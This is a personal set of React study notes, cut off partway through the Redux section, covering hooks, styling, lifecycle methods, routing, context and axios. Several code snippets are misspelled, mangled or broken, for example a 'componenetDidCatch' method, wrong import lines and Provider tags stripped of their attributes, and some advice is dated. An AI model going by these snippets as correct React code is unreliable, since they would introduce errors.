All HTML attributes like onclick become onClick in JSX. See In a class that extends `Component`, define arrow function for eventHandler (use arrow function to correctly capture "this"). Then do , for e.g., <button onClick='this.eventHandler'>...</button>. When the button is clicked it will call the function `eventHandler()` of your class, which if it then modifies the class state, will cause the component to be re-rendered into the DOM. To pass data to a handler use the bind() method. <button onClick={this.myHandler.bind(this, param1, param2, ...)> If you've used arrow functions the binding to this isn't necessary - the arrow function will have captured it, but because we want to bind other parameters, we now have to have this as the first parameter to bind(). This is why with arrow functions we don't have to use bind() if there is no extra data to pass into the handler. The other way to accomplish this is to use an arrow function, and it looks a little nicer IMO, BUT BUT apparently it can be less efficient and bind() is therefore preferred. <button onClick={() => this.myHandler(param1, param2, ...)}> Handling Events --------------- * React events are named using camelCase, rather than lowercase. * React event handlers are passed instances of SyntheticEvent, a cross-browser wrapper around the browser's native event. Same interface as the browser’s native event. * 'nativeEvent' attribute to get underlying browser event object. * SyntheticEvents are pooled. * With JSX you pass a function as the event handler, rather than a string. * Cannot return false to prevent default behavior in React. You must call preventDefault explicitly. From: Wrapping native event instances can cause performance issues since every synthetic event wrapper that's created will also need to be garbage collected at some point, which can be expensive in terms of CPU time. React deals with this problem by allocating a synthetic instance pool. Whenever an event is triggered, it takes an instance from the pool and populates its properties and reuses it. When the event handler has finished running, all properties will be nullified and the synthetic event instance is released back into the pool. Hence, increasing the performance.
Hooks
All React hooks are called "useXXX". import React, {useXXX, useYYY, ...} from 'react'; useState() hook --------------- So, now instead of using class `state` variable, in function-based componenet do: const app = (props) => { const [ theCurrentState, theSetStateFunction ] = useState({... state object defn ...}); Now, where you would use `this.state` use `theCurrentState` and where you would use `setState()` use `theSetStateFunction()`. And in your handler functions, just put them inside the component defn function and reference the function in the JSX returned. NOTE - the handler must be an arrow function so that it is lexically scoped and captures `theCurrentState` and `theSetStateFunction` in the enclosing compononent def func. const app = (props) => { const [ theCurrentState, theSetStateFunction ] = useState({... state object defn ...}); const myHandler = () => { theSetStateFunction({...}); } return JSX-which-has-myHandler-as-an-onXXX-function; }; !!!!BUT CAUTION!!!! theSetStateFunction() does **NOT** do a merge like setState() does. You must do the merge yourself manually! But you can get around this with many useSate() calls - state "slices". This is a new way - the class based method is still seemingly the standard.
Css
Import into your JS files so that WebPack is aware of its existance. Put CSS for component in component's dir and use class name same as component's name. For things like "box-shadow" it converts this CSS property to the difference browser variables for us like "-webkit-box-shadow" and "box-shadow" for us so our CSS can be more brief and generic. Inline styles ------------- The style can be modified in the JS using inline styles. The CSS code ports almost directly to a JS object definition except REPLACE "-" WITH CAMEL CASE e.g. render() { const style = { backgoundColor:'white', border:'1px solid blue', ... }; return ( <div style={style}>.....</div> ); } CSS Modules ----------- See See See A CSS Module is a CSS file in which all class names and animation names are scoped locally by default. It does this by automatically creating a unique classname of the format [filename]_[classname]__[hash]. This automatically creates CSS names that would look a lot like the names you might create if you are using the BEM CSS naming in a non-react project where you need to name you classes to identify the blocks they refer to etc. Use CSS module like this: import styles from './Button.module.css'; // Import css modules stylesheet as styles ... class Button extends Component { render() { // reference as a js object return <button className={styles.Error}>Error Button</button>; // ^^^^^^^ // Gets locally scoped error CSS from sytems imported above. // So CSS has a def `.error: {...}` } } Can also specify an array for `className` to apply many classes to an object, using the normal string with spaces, by joining elements of an array. E.g.: <button className={[styles.Error, styles.Big].join(" ")}>...</button> Can specify which style dynamically by using `styles['Big']`, e.g.: <button className={[styles.Error, styles[props.btnSize]].join(" ")}>...</button> NOTE: react-scripts >= 2.0 you do NOT have to eject and CSS modules must be `*.module.css`. For react -scripts < 2.0, to enable CSS modules (required for react-scripts < 2.0). 1. npn run eject From:. The eject command will have created a new top level directory, called "config" for you, which has received the above mentioned script copies. The "package.json" file will now also be A LOT larger. You can now see _all_ of your dependencies in detail. 2. Goto "ROOT/config/webpack.config.dev.js" Search "css-loader". You should see: { test: /\.css$/, use: [ require.resolve('style-loader'), { loader: require.resolve('css-loader'), options: { importLoaders: 1, }, }, ... Add the following options, under "importLoaders": options: { importLoaders: 1, modules: true, localIdentName: '[name]__[local]__[hash:base64:5]', }, Copy these two options into the production build file too! This is all that is required. CSS modules should now be good to go! Using Web Fonts --------------- You can add includes of web fonts to "ROOT/Public/index.html". Goto fonts.google.com, select and customise the font that you like, get the CDN link and shove it into index.html above the title tag.
Conditional Rendering
In JSX we can execute simple JS expressions in {...}. This means that we could render based on the ternary operator "cond ? true-path : false-path". Note cannot use if-else as this is too complicated. Could we use a function and immediately evaluate it though? Not sure - need to try. E.g., return ( <div> { this.state.someCondition ? <div> ... some tags ... </div> : null // "null" means nothing is rendered } ... </div> ); ^^^ This gets MESSY fast, especially when multiple conditions are nested. It is BETTER to do the FOLLOWING: let myElements = null; if(this.state.someCondition) { myElements = ( <div> ... some tags ... </div> ); } ... return ( <div> {myElements} </div> ); ^^^ This is EASIER TO READ AND MAINTAIN! Keeps our core JSX template CLEAN!
Rendering Lists
If the state, or whatever other variable has a list of attributes for a list of like-tags we can do this: return ( <div> {this.state.listMember.map((member, index) => { return <TheElement somehandler={someHandlerFunction.bind(this, index)} prop1={member.prop1} prop2={member.anotherProp} key={index} /> // You SHOULD ALWAYS PROVIDE A KEY!! })} </div> ); The map() funciton returns an array - JSX knowns how to render a list of ReactElement objects so this works okay. NOTE - arrays are references to an array - so const arrayMemberRef = this.state.arrayMember; // Gets a reference to the state.arraymember!! arrayMemberRef[0] = 123; // !!!!WARNING!!!! This mutates the reactJs managed state object which can produce UNDERIABLE BEHAVIOUR this.setState({arrayMember : arrayMemberRef}); NOTE - When rendering lists of data ALWAYS USE THE KEY PROP. It helps react know what changed in the list more efficiently.
Use Pseudo Selectors In Javascript
Requires package called "Radium" From your project directory: npn install --save radium Radium lets pseudo selectors and media queries be used from the JS > import Radium from 'radium'; Then > export default Radium(App) To create a higher order componenet. Radium wraps you App. It can wrap both classes and function-based componenets. With radium installed you can add the following to your style objects in JS code: const style = { color: 'white', ..., ':hover': { ... set of styles for the hover state ... }, ':another-pseudo-selector' : { ... another set of styles ... }, }; You can also do media queries in the same way, EXCEPT you will have to use <StyleRoot> around your App: In any componenet(s) you like: const style = { ... '@media (min-width: 500px)': { ... }, ... }; Then in your app: import Radium, { StyleRoot } from 'radium'; ... class App extends Component { ... render() { return ( <StyleRoot> ... your original app content JSX ... </StyleRoot> ); } }
Styled Componenets
styled-components.com Tries to make styling components easy. Do: npn install --save styled-componenets Use: import styled from 'styled-componenets.js'; const StyledButton = styled.button` ../ write regular CSS within the back ticks ... `; const StyleDiv = styled.div` ../ write regular CSS within the back ticks ... &:hover { // <<<< Special way to add pseudo element styles using styled componenets } color: ${props => props.altColour}; //<<< Note use of ${...} to access props `; ... class .... { ... render() { ... return( <!-- Note how props can be passed to styledComponents for dynamic CSSS --> <StyledDiv altColor={this.state.my_colour_variable}> <StyledButton onClick={...}/> ... </SyledDiv> ); } ... } People seem to like this because you get scoped styles - I.e., they apply only to the component not to the entire application. BUT - you are now mixing markup with code, which was the entire point of CSS/HTML seperation in the first place! BETTER? - Use CSS Modules - Haven't written notes on this...
Error Boundaries
See: Only availabele in ReactJS >= 16 Allow us to catch errors (exceptions) and handle them gracefully. They are a form of Higher Order Component (HOC) they wrap the componenet that may throw an error. Notes on this later. class ErrorBoundary extends Componenet { state = { hasError: false, errorMsg: '', } // this is a special method that react knows to call if any of the children // throw an exception componenetDidCatch(error, info) { this.setState({hasError: true, errorMsg: error}); } render() { if (this.state.hasError) { // If there was an error render something usful return <h1>{this.state.errorMsg}</h1>; } else { // Otherwise just display the components this component wraps return this.props.children; } } } Then in your App render or whatever, just wrap any elements that may have failures that are _not_ under your control (i.e. dont wrap everything - you want to catch errors that are under your control and make sure thay cannot happen) with <ErrorBoundary>....</ErrorBoundary> (class name just an example - you can choose).
Class Based V.S. Functional Components
Class based Access to state Lifecycle Hooks Functional based ReactJS <16 _no_ access to state, but .+ 16 has access to state via useState() _No_ access to lifecycle hooks
Class Component Lifecyle
See also >> Good diagram >> Functional component have an equivalent but this is for class based components only. ReatcJS components have the following LIFE CYCLE HOOKS methods: - constructor(props) (default ES6 class feature, unlike the rest which are React specific) - static getDerivedStateFromProps(props, state) should return updated state - getSnapshotBeforeUpdate(prevProps, prevState) - componenetDidCatch() - componentWillMount() [might be deprecated] - componentWillUnmount() This can be used to do cleanup work like de-register event handlers etc. - shouldComponentUpdate(nextProps, nextState) - componentDidUpdate(prevProps, prevState, snapshot) After the update finished. The one that is most used is this method, e.g., to fetch new data from server. - componentDidMount() - render() Note: Life-cycle hooks are not, and have nothing to do with, React Hooks. Creation life cycle hooks execute in this sequence: CREATION --> constructor(props) [must call super(props). Set state. Must have NO side-effects] constructor(props) { super(props); ... do other init stuf ... // Can init state here - but dont call setState() as there is nothing to merge with yet this.state = { ... }; } --> getDerivedStateFromProps(props, state) [Sync state when props changed - niche. Must have NO side-effects] --> render() [Prepare and structure JSX code. Nothing that blocks!] --> render all child components and run their life cycle hooks... --> componentDidMount() [Do NOT update state (synchronously), but DO cause side effects, eg, HTTP requirets] Component update (when props or state change) life cycle hooks execute in this sequence: UPDATE --> getDerivedStateFromProps(props, state) [rarely needed] --> shouldComponentUpdate(nextState, nextProps) [Allows us to CANCEL the update process for optimisation. Do NOT cause side effects] Must return either True (do the update) or false (cancel the update) --> render() [constructs virtual DOM for merge into the real DOM] --> render all child components and run their life cycle hooks... --> getSnapshotBeforeUpdate(prevProps, prevState) Must return either null or an object, which will be received in componenetDidUpdate Example might be getting current scroll position so it can be restored in next step. --> componentDidUpdate(prevProps, prevState, snapshot) [NO (synchonous) state update but can cause side effects] shouldComponentUpdate() is the one you will use for OPTIMISATION! Optimising using shouldComponentUpdate() ---------------------------------------- If a parent component updates, but the specific child has not updated (another child or the main element might have), then it can use shouldComponentUpdate() to stop itself needlessly being rendered into the ReactJS virtual DOM. For example, shouldComponentUpdate(nextProps, nextState) { // Bit note - be careful - this compares references, so if the references dont change // but the contents does, then this wont work! This is a SHALLOW comparison! return nextProps.propsOfInterest != this.props.propsOfInterest; }
Functional Hooks
See: > By using this Hook, you tell React that your component needs to do something after render. > React will remember the function you passed (we’ll refer to it as our “effect”), and call it > later after performing the DOM updates. Use the "useEffect()" hook. import React, { useEffect } from 'react'; useEffect() is the second most important reactJS hook next to the useState() hook. It combines all of the class hooks above into one function. It is _not_ a lifecycle hook, however, it is a react hook! useEffect() takes a function as an argument that is called for each render cycle. Can be used for all the stuff that would be done in "componentDidUpdate()", e.g., a HTTP req. It also does "componentDidMount()" (called for the first render). You can use "useEffect()" as many times as you like. useEffect( () => { ... do stuff ... }, [list-of-data]) ^^^^^^^^^^^^^^ Secnd argument to useEffect() It is a list of references to all of the data used in the function. The function will only run when a data item in this list changes. So, if we use "props.member", it would only be called when the props change. If you have different effect that depends on different data just use the function more than once. To make the "useEffect()" run only once, when it is created, just pass a second argument that is an empty list - []. As there are no dependencies for the func, therefore, it will never be re-run because a dependency change. But, it will run once at creation. > You can tell React to skip applying an effect if certain values haven’t changed between > re-renders. To do so, pass an array as an optional second argument to useEffect If "useEffect()" returns a function, this function is run after the render cycle. Thus, you can return a function if you want to do some cleanup. useEffect( () => { ... do stuff ... return () = > {... do cleanup work ...}; }, []) // The empty list only renders this when the component is created, not on every render cycle Optimisation ------------ Use React.memo() to wrap your functional component to memo-ise it!
When To Optimise
Not always is the answer! If child always updates with parent then no need to optimise and using either shouldComponenetUpdate or react.memo() is actually inefficient as they will always find that the component changes - so its extra work for no reason. If you care checking ALL proprties for change, you don't need to override shouldComponentUpdate(). You can, instead, extend PureComponent. This is just a component that a component that implements shouldComponentUpdate() and checks for any change in props.
How Reactjs Updates The Dom
See: See: ReactJS render() method does _not_ render to the DOM. It edits a ReactJS internal DOM. React compares the old vidtual DOM to the new virtual DOM and diffs them. The virtual DOM is used because it is _faster_ than the real DOM. Acessing the deal DOM is s-l-o-w!! If the diff of the VDOMs shows a difference, only then does React reach out to the real DOM and updates it - and _only_ in the places where it updated, it does _not_ re-write the entire DOM.
Higher Order Components (Hocs)
A HOC wraps another component, possibly adding some logic to it etc. For e.g., error handling. Convention is to name Hocs with a "With" at the beginning. e.g. "WithExtraInfo". Create HOC method #1: --------------------- Use for HOCs that modify the HTML of the component in some way - so you can place it inside your JSX. Do: import React from 'react'; const withBlah = props => ( <div className="blah"> ... what ever extra components you want ... {props.children} <!-- <<<< This is what we're wrapping --> ... what ever extra components you want ... </div> ); export default withBlah; Then you use it in another component: import withBlah from 'react'; ... <WithBlah> ... </WithBlah> Create HOC method #2: --------------------- Use for HOCs that add behind the scenes logic like error handling. Do: import React from 'react'; // Normal JS function const withBlah = (WrappedComponent, param1, param2, ...) = { // ^ // Must start with a capital // From the normal JSX function, return the React component function. return props => ( <div className="blah"> <WrappedComponent {...props}/> <!-- NOTE: You cannot use props={props} because the Wrapped component would receive this as props.props, an child of its props component. Hence you have to use the spread operator as shown --> </div> ); }; Then you use it to wrap a component in an export: ... export default withBlah(App, param1, param2, ...);
Prop Types
See Allows to specify which props the component accepts and their props. npm install --save prop-types It is provided by the react team/community. It is not in react core hence you have to npm install it. Then: import PropTypes from 'prop-types'; Then, after your component definition, whether functional or class based, add another property. class MyComponent { ... }; // React will look for "propTypes" when in development mode and spit out warnings if the prop // types are violated. MyComponent.propTypes = { // Lower case "p" for "propTypes" is important // In here define the props that are used by your component and their types... // The keys will be your prop names and their values the types click: PropTypes.func, // You can even specify the function prototype! prop1: PropTypes.string, prop2: PropTypes.number, ... }; Can chain conditions. E.g. prop1: PropTypes.string.isRequired Can also be applied to function components in exactly the same way. Component children, i.e., `props.children` shold also be put into the propTypes spec. static propTypes = { children: PropTypes.oneOfType([ PropTypes.arrayOf(PropTypes.node), PropTypes.node ]).isRequired } (See) Arrays of shapes: MyComponent.propTypes = { items: PropTypes.arrayOf( PropTypes.shape({ code: PropTypes.string, id: PropTypes.number, }) ), }; Directly from the docs:.' ); } }) }; It seems one can kinda use PropTypes with contexts: Ref:: const TestingContext = React.createContext("light"); TestingContext.Provider.propTypes = { value: PropTypes.oneOf(["light", "dark"]) }; const Testing = () => ( <TestingContext.Consumer>{value => <h1>{value}</h1>}</TestingContext.Consumer> ); const App = () => ( <div> <TestingContext.Provider <Testing /> </TestingContext.Provider> <TestingContext.Provider <Testing /> </TestingContext.Provider> {/* PropTypes warning since value 'asdf' doesn't match propTypes rule */} <TestingContext.Provider <Testing /> </TestingContext.Provider> {/* default value used since it's not wrapped in a Provider */} <Testing /> </div> );
Using React References
References give us access to our DOM elements. IN CLASS BASED COMPONENTS ------------------------- Can add a "ref" keyword to any components, including your own defined components. It gives you the ability to access an element in the DOM without having to use DOM selectors to find it in the DOM. React magically ties your component class with the object in the DOM. You can use this to call DOM specific stuff like "setFocus()" for example. Lets say you have a component: class MyComponent extends Component { constructor() { super(); // Must always capp super()!! this.inputReference = React.createRef(); } componentDidMount() { this.inputReference.current.focus(); // ^^^^^^^ ^^^^^ // ^^^^^^^ We can access the DOM function :) // ^^^^^^^ // Must use the "current" property to get the current reference. } render() { <div> ... <input ref={this.inputReference} ... /> ... </div> } }; IN FUNCTIONAL COMPONENTS ------------------------ const myFuncComponent = props => { const elementRef = React.useRef(null); // ^^^^ // elementRef will only be linked to the html_element when the return statement is // executed. Therefore it can only be accessed after this. To do this, the useEffect() // hook must be used, as this runs _after_ the compoment JSX has been rendered for the // first time. useEffect( () => { elementRef.someDOMFunction(...); return () => { // This function is run to do cleanup work in useEffect() }; }, []); // ^^ // RECALL: the empty list means this only runs once when first rendered and _not_ on each // render! return ( <div> <html_element ref={elementRef}>...</html_element> </div> ); };
Context Api & Prop Chains
Good reads: - Note - if you see stuff with "childContextTypes" in it, it is the LEGACY API! Take care --------- Although the docs say that "Context is designed to share data that can be considered 'global' for a tree of React components ...", note that the 'global' data being shared is relatively STATIC, generally, as far as the child component is concerned - it won't update that data and cannot decide whether it should render based on changes in the context. This is why, for example, lifecyle methods haven't been expanded to see the previous context in the same way that one can see the previous props in functions like shouldComponenetUpdate() - i.e., the context doesn't appear to be designed to hold volatile state - obvs it might not be totally static, but just be aware. It's also NOT A GREAT WAY TO RESOLVE PROP DRILLING, for the same reson: when deciding when to re-render the context consumer cannot see the prevous context. The docs have this to say: "If you only want to avoid passing some props through many levels, component composition is often a simpler solution than context." VERY MUCH WORTH TAKING NOTE OF Class Based Components ----------------------- Prop chains are where a prop is passed down from component A to grand-...-grand-child component X via all the intermediate children, some or all of which may not care about the prop. React offers "contexts" to help tidy what might be a messy load of prop chains. You can create a context module. The course example is an authentication context. It is created in a folder named "context" in a file named "AuthContext". import React from 'react'; // The context is like a globally available JS object, just hidden inside the react "scope". // const authContext = React.createContext(...default-init-value...) // ^^^^^^^^^^^^^^^^^^ // Normally an object but can be a number, string etc const authContext = React.createContext({ authenticated: false, // Default values dont really matter, but makes IDE auto complete better login: () => {} }); export default authContext; So, now in your application or the most parentish component that will "own" the context: import 'AuthContext' from '../context/auth-context'; // AuthContext is used as a component that MUST WRAP ALL COMPONENTS THAT REQUIRED ACCESS TO IT. class App extends Component { render() { return <!-- -- NOTE here the AuthContext.Provider takes a value prop. That is why the defaults, generally, -- dont matter. Outer curlies to enter dynamic content v vInner curlies define the JS object vv --> <AuthContext.Provider value={{authenticated: this.state.authenticated}}> <div> ... All components that need access to the auth context ... </div> </AuthContext.Provider>; } } NOTE how the state is still managed by, in this case, the App component, not in the Authentication context. The reason for this is that React will only update when a state or prop changes, therefore, updating it in the context object would _not_ cause a re-render. Hence it is managed and updated by the app and just passed as a value to the context object. Then in components that want to use the authentication context we do the following. These components can be anywhere in the component hierachy and thats how we skip having to pass down props in trains. import AuthContext from '../../context/auth-context'; class SomeComponent extends Component { render() { return <AuthContext.Consumer> <!-- Return a function which the AuthContext can then call with the context as a parameter to said function. vvvvvvv --> {(context) => { return ... your componenet code ...; }} <!-- ^^^^ You dont have to wrap every component. You could wrap a subset of the components rendered if only they need the context --> </AuthContext.Consumer> } } The AuthContext.Consumer is quite clunky and only gives you access to the context in the JSX code and nowhere else. The alternative for class based components is this (React >= 16.6): class SomeComponent extends Component { static contextType = AuthContext; //^^^ ^^^^ //^^^ Must be spelt exactly like this! //Must be a static property // // Allows React to connect your component with this context behind the scenes componentDidMount() { this.context.login; //< Access the context with "this.context" which ReactJS creates for us } render() { return .. your JSX code {this.context.login ? <p>Logged in</p> : <p>Log in</p> } ... // ^^^^^^^^^^^^ // Can access it here too, without the wrapping consumer element. } } Functional Based Componenets ---------------------------- React hooks can do the same thing for us. Import the "useContext" hook. PropTypes For Contexts ---------------------- See the PropTypes section for an example of how this can be done. It seems okay but if the context is dynamic it is still hard to test it on a per-component basis.
Planning A React Up
Steps: 1. Component Tree / Component structure 2. Application State (data) 3. Components vs Containers Recall: components are "dumb" - just presentational and containers are statefull. Advise separate high-level directories for componenets and containers with subdirectories for each component/container. Recall: component/container subfolders with a Capital first letter.
Http & Ajax
Fake online REST API for Testing and Prototyping: XMLHttpRequestObject -------------------- Oldest and best supported but I'm gonna ignore it. If browser doesn' support newer Fetch API I assume Axios is the best drop in replacement. FETCH ----- This is the newer version of XMLHttpRequestObject that is much easier to use and works with promises and asynchronous functions: Given the workflow of CreateReactApp, the JS should be transliterated into JS that is also compatible with older browsers - I hope! AXIOS ----- 3rd party JavaScript library promise based HTTP client Given the workflow of CreateReactApp, the Axios JS will be transliterated into JS that is also compatible with older browsers! Happy days! npm install axios --save ^^^^^^ Makes it store an entry in the package.json file In a new component file "my-first-axios.js": import axios from 'axios'; const instance = axios.create({ baseURL: '' }); In existing component that wants to use AJAX: import axios from '../path/to/my-first-axios'; ... some_handler = () => { ... probably set some "I am loading state" ... axios.post( '/endpoint relative to baseURL', javascript-object-repr-json ).then( response => { ... probably cancel "I am loading state" and update some components ... }).catch( error => { ... probably cancel "I am loading state" and update some components ... }); } Handle GET requests similarly using axios.get().
Multi Page In Single Page App (Routing)
React core does not implement routing. A third party defacto-standary package called react-router is can be used. Routing - show different pages to user based on path in URL. User JS to render different pages based on which path the user has navigated to. Router package helps parse the path to figure out where user wants to go to. We then link these up to where we want to point the user. Server side, the same file is returned no matter what the path is - so has to be setup to do this. The paths are only significant on the CLIENT SIDE. INSTALLATION: npm install --save react-router react-router-dom Technically, only react-router-dom is required for web development. It wraps react-router and therefore uses it as a dependency. ENABLE: Do in index.js or App.js. In App.js wrap the App div inside "BrowserRouter". All children of the <BrowserRouter> tag will be able to access its routing functionalities: import React, {Component} from 'react'; import {BrowserRouter} from 'react-router-dom'; // << INCLUDE THIS class App extends Component { render() { return ( <BrowserRouter <!-- << USE IT LIKE THIS --> [ <!-- The app contents --> </div> </BrowserRouter> ); } } USE: In components/containers: Render small things ------------------- import {Route} from 'react-router-dom'; ... render() { <!-- Note how Route tag is self closing --> <Route path="path for which this path should become active" render={some function to render for this path} /> <!-- For example: --> <Route path="/" exact <!-- << NOTE means final slash is necessary to match - means "is my complete path like this?" vs "does my path start with this?" --> render={() => <div>A test</div>} /> <!-- Route more-or-less replaces itself with the content defined in render. You can even use multiple route's for the same path --> } Render components ----------------- But if you want to RENDER A COMPONENT, use the component property like so: <Route path="..." [exact] component={Ref to function or class to use} /> Prevent reloads on link navigation: ----------------------------------- Reloading a page KILLS THE CURRENT APP STATE!! WE DO NOT WANT THIS To prevent links always re-rendering pages, i.e., reloading them, the links must be changed to look like this: Don't use <a>, use <Link>! The <a> tag... <a href="...">...</a> ... is replaced with a <Link> tag: <Link to="...">...</Link> ... or, more completely but with more complexity: <Link to={{ pathname: '/something' <!-- NOTE: This is always treated as an ABSOLUTE path... --> hash: '#something' <!-- ...wether or not it has a prefix of '/' --> search: '?arg=param' }}>...</Link> This allows react to intercept the link click and instead of the page being loaded from fresh, it can just render what changes are needed WITHOUT having to reload the page. Note that the link pathname is always treated as an absolute path, so if you want to use a relative path you have to build it up into an absolute one by using the page you are currently on, given by "this.props.match.url", and appending the target: e.g., pathname: this.props.match.url + "/relative/path"; If you want to add some styling to the active and non-active links it is bettery to use <NavLink>. This adds an "active" class to the active link for you. Note there can be many "active" links if more than one Link path matches. The reason for this is that the link path is TREATED AS A PREFIX (just like in Router). So to match exact use the exact attribute. <NavLink to={{ pathname: '/something' <!-- << This is always treated as an ABSOLUTE ... --> [exact] <!-- ... path whether or not it has a prefix of '/' --> [ <!-- << NOTE that routes are used in the order they are defined to, "/something" will match before :id, but rember ALL ROUTES ARE RENDERED IF THEY MATCH THE PATH --> <Route path="/:id" exact component={...}/> To pass route parameters via our links just do something like <Link to={'/path/' + this.props.id}> ... child elements or text ... </Link> To get the value of "id" in the component we need to access the magic props attributes that Router added for us: match.params['id'] // It is called "id" as that was the name in the Route:path definition Can also use match.params.id Remember the ALL the Routes that match the path will be rendered. If you want only ONE match to be rendered (the one that is seen first btw), the use <Switch> to wrap the <Route> tags: <Switch> <Route .../> ... <Route .../> </Switch> Search Parameters ----------------- These are not the route parameters which come from that _path_ in the URL. These are the query parameters that occur at the end of the URL after a "?". For example: Pass in links using <Link to=""/> Or <link to="" search="?my_value=123"/> Can the access using props.location.search To parse search string easily use: const query = new URLSearchParams(this.props.location.search); for (let param of query.entries()) { console.log(param); } URLSearchParams is a built-in object, shipping with vanilla JavaScript Natigating Programatically -------------------------- To navigate to a page: props.history.push({pathname: "/my/link/path"}); or props.history.push("/my/link/path"); Nested Routing -------------- Load a component inside another component which is also loaded via routing - you can use the <Route> component wherever you want, as long as the page is a child, grandchild etc of the <BrowserRouter> component. WARNING: that nested <Route>s do not resolve relative to their parent route. For example, if the parent was "/pull-requests" and the URL was "/pull-requests/1/" and the child route is "/:id", this does not resolve to "/pull-requests/:id"! To solve this in nested routes, get the current path DYNAMICALLY: <Route path={this.props.match.url + '/:id'} /> WARNING: React router does not always _replace_ the component so it won't always re-render the component. The lifecycle hook componentDidMount() won't get called. But what will be called is componentDidUpdate() so this will also need to be implemented. But be careful - the decision as to wether to re-render must avoid infinite loops! Redirecting Requests -------------------- Rather than having multiple paths to render the same content, you can use special Redirect component from react-router-dom: <Switch> ... <Redirect from="/" to="/pull-requests"/> <!-- Can only use "from" inside a Switch --> </Switch> Redirect doesn't render content - it redirects the URL which can then be caught by another route and then rendered by the actual route. So as soon as it is "rendered" the page URL will be changed, regardless of any other components that would otherwise have been rendered after it. E.g., <Redirect to="/pull-requests"/> <!-- No "from" allowed outside of a <Switch> --> <p>Some text</p> <!-- Will not be rendered because of redirect --> Such redirects can be used conditionally using normal JS. E.g.: const redirect = some-condition ? <Redirect to="..."/> : null; <div> {redirect} ... some content ... } </div> Sometimes, if you want to push a new page onto the history stack (redirect _replaces_ the top of the stack) to maintain navigability use `props.history.push(url)` instead. Guards ------ Ways to stop pages being navigated to if they should not be accessilbe - e.g. because they require the user to have authenticated (logged in). Just use Javascript! {this.state.auth ? <Route ... /> : null} ^^^^^ If definition isn't rendered then this route does not exist. Handle Unknown Routs - 404 -------------------------- Make the _last_ Route in your Switch <Route render={() => <h1>Not Found</h1>} /> Lazy Loading ------------ NOTE: requires react-router >= 4 & create-react-app (Webpack config required) For big apps don't want to down load *all* the app code... only code that will be needed. So, for pages etc that are seldomly likely to be visited or components seldomly used, we only want to download their code on demand, not "up front". loading, a.k.a "code splitting", is the way to address this. To do this you need to create a HOC "asyncComponent" - left this for now... come back to it if I ever need it. BUT - if React >= 16.6 you can use React Suspense to do this for you :D React Suspense adds a new method to the Component object that you can use to do lazy loading!
Form Validation
For inputs when adding an "onChange" event handler remember two way binding! You have to modify your state so that the changes made will be rendered. The submit button does not needto have its "onClick" property used. The form JSX tag has an "onSubmit" property which can be used to supply a validator function reference that guards form submission. In submission event handler remember to use event.preventDefault(); IMPORTANT - Use event.preventDefault() otherwise form submission reloads the page!
Redux
See: Redux - 3rd party library. Most often associated with React but not part of React. It is independent. One of the benefits of Redux is that it makes state changes predictable and transparent. Every time an action is dispatched, the new state is computed and saved. The state cannot change by itself, it can only change as a consequence of a specific action. -- From redux online docs It provides a _clearly defined process_ on how the _state in some central store_ can change. It provides a GLOBAL STATE across the entire app, that ALL components/containers can access in a well defined way. Why not just globals: From this post (): It's important to remember why we consider global variables bad: because anything can change them at any time and you won't know why during debugging ... Redux solves the visibility problem really well by introducing an event driven paradigm to state. ... ... the restriction of sending typed actions and then doing work explicitly designed with reducers (instead of having business logic scattered all over the place inside components) ... ... Use redux for what's really global and for every thing else I would keep state as close as possible to where they are used. Why not just global, from this post () Lots of reasons: - Isolation of "write logic" means you know where to look to see what code is updating a given chunk of state - Consistent state handling means it's a lot easier to think about what's going on in the application - The DevTools show you a log of dispatched actions, and enable you to step back and forth between states to see what the UI looked like at each point - Middleware lets you centralize app-wide logic, such as consistent transformations for AJAX responses - Redux's constraints (such as wanting state to be serializable) enable a number of other use cases, such as persisting state across page reloads and synchronizing multiple stores remotely. - There's a rapidly growing ecosystem of addons and utilities for specific use cases (see ) - I use time-travel debugging on a daily basis, and it's a _huge_ time-saver for me. +---> Reducer -----+ : : : : +---> Reducer -----+-----> ROOT reducer | | | Action ------> MiddleWare --------+---> Reducer------+ | ^ | | | [Updates] | [Dispatches] | | v Component Central Store ^ | | [Passes updated state] | [Triggers] | | +------------ Subscription <------------------------------------+ Redux provides a central store, which is the ENTIRE APPLICATION STATE. Most often this will be things like the authenticated state of the user, for example. Actions are a way for a component to tell Redux "I'd like to change the state... here is the plan on how to do that". They are just a pre-defined informational package, optional payload, that tells Redux about the plan. This is the PUBLISH a.k.a DISPATCHING AN ACTION. Reducers receive actions and handle the update of the central store. THe reducers must be completley SYNCHRONOUS ans have NO SIDE EFFECTS. If there are multiple reducers, they are, in the end, merged into one single reducer, which is what gets to modify the central store. Once the central store is updated it informs all its SUBSCRIBERS of the state change, passing the updated state, as props, to its subscribers. Install Redux in the usual manner: npm install --save redux REDUCER: Gets: State, Action. Returns: Updated state. But original state must NOT be mutated! Just like it setState() func. NEVER mutate any data! const rootReducer = (surrentState = intialSate, action) => { // ^^^^^^^^^^^^ // Useful because when reducer created it wont be passed a state if (action.type == ...) { ... do something for this type } else if (action.type == ...) { ... } // and so on... return new_state; // new_state must COPY from state. state must NOT be mutated } STORE: Created with a root reducer. createStore = redux.createStore; const store = createStore(rootReducer); let currentState = store.getState(); ACTION: Just access store and call dispatch(). Func takes action as arg - a JS object that MUST have a "type" property so that we know what type of action was dispatched and what should be done in the reducer. store.dispatch({ type: 'CONVENTION_IS_SHORT_UPPER_CASE_DESCRIPTION' value-name-of-choice: value-data, more-values: more-data, ... ... }); SUBSCRIPTION: Inform us when something changed and we need to re-get the state. Use: store.subscribe(function-executed-whenever-state-updates); store.subscribe( () => { // Subscribe func gets NO args ... store.getState(); ... }); Using Redux With React ---------------------- Must install react-redux to "hook up" redux stores to react application: npm install --save react-redux The Redux store should be created before or when our App or when it starts - use `index.js`! import { createStore } from 'redux'; import { Provider } from 'react-redux'; //NOTE: Must WRAP the app with <Provider> import reducer from './store/reducer'; // Generally may have many complex Reducers // so these will be stored in their own files in their // own folders in our app. Perhaps a "store" folder next // to the containers and components files. const store = createStore(reducer); // Define in separate file, reducer.js // NOTE: Must WRAP the app with <Provider> ReactDOM.render(<Provider store={store}><App /></Provider>, ...); // ^^^^^^^^^^^^^^^^^^^^^^^ // Wrap app with Provider, which provids our store. "injects" our store into the // reactor components in the app. registerServiceWorker(); In reducer.js - - - - - - - const initialSate = { ... }; const reducer = (state = inialState, action) => { // your actions here or just return state if nothing should change. if (action == 'ACTION_TYPE') { return { // Immutably created new state }; } ... ... return state; // LAST RETURN handles unrecognised actions and returns state unchanged. // Or use switch (action.type) { case 'BLAH': break/return; ... default: return state; } }; export default reducer; In the reducer you can replace the if-else blocks with a switch statement: switch(action.type) { case 'SOME_TYPE_1': return { new_state_member: new_value, ... } case 